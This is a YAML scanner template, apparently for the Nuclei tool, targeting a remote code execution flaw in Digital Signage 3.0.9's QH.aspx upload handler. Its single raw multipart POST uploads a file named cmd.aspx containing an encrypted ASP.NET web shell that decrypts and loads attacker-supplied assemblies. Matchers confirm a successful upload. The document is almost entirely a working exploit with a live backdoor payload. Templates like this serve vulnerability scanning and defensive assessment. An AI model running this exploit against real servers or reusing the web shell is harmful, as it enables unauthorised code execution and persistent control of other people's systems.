id: Digital-Signage-rce

info:
  name: Digital Signage 3.0.9 版本 QH.aspx 文件 远程代码执行漏洞
  author: Str1am
  severity: critical
  reference: https://www.zeroscience.mk/codes/qhsignage_rce.txt
  tags: Digital,rce

requests:
  - raw:
      - |
        POST /QH.aspx HTTP/1.1
        Host: {{Hostname}}
        Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryhbcZX7o0Hw19h3kr

        ------WebKitFormBoundaryhbcZX7o0Hw19h3kr
        Content-Disposition: form-data; name="fileToUpload"; filename="cmd.aspx"
        Content-Type: application/octet-stream
        
        <%@ Page Language="C#" %><%@Import Namespace="System.Reflection"%><%Session.Add("k","e45e329feb5d925b");  Encoding.Default.GetBytes(Session[0] + ""),c = Request.BinaryRead(Request.ContentLength);Assembly.Load(new System.Security.Cryptography.RijndaelManaged().CreateDecryptor(k, k).TransformFinalBlock(c, 0, c.Length)).CreateInstance("U").Equals(this);%>
        ------WebKitFormBoundaryhbcZX7o0Hw19h3kr
        Content-Disposition: form-data; name="action"
        
        upload
        ------WebKitFormBoundaryhbcZX7o0Hw19h3kr
        Content-Disposition: form-data; name="responderId"
        
        ResourceNewResponder
        ------WebKitFormBoundaryhbcZX7o0Hw19h3kr
        Content-Disposition: form-data; name="remotePath"
        
        /opt/resources
        ------WebKitFormBoundaryhbcZX7o0Hw19h3kr--
        
    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200
      - type: word
        words:
          - "cmd.aspx"
          - "true"
        part: body
        condition: and